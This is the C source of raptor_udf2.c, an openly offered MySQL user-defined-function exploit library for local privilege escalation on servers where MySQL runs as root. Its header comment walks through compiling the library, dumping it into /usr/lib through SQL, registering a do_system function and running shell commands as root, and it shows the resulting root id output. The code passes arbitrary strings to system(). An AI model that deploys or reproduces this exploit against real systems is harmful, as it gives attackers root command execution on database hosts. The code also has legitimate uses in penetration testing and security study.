/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <[email protected]>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <[email protected]>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
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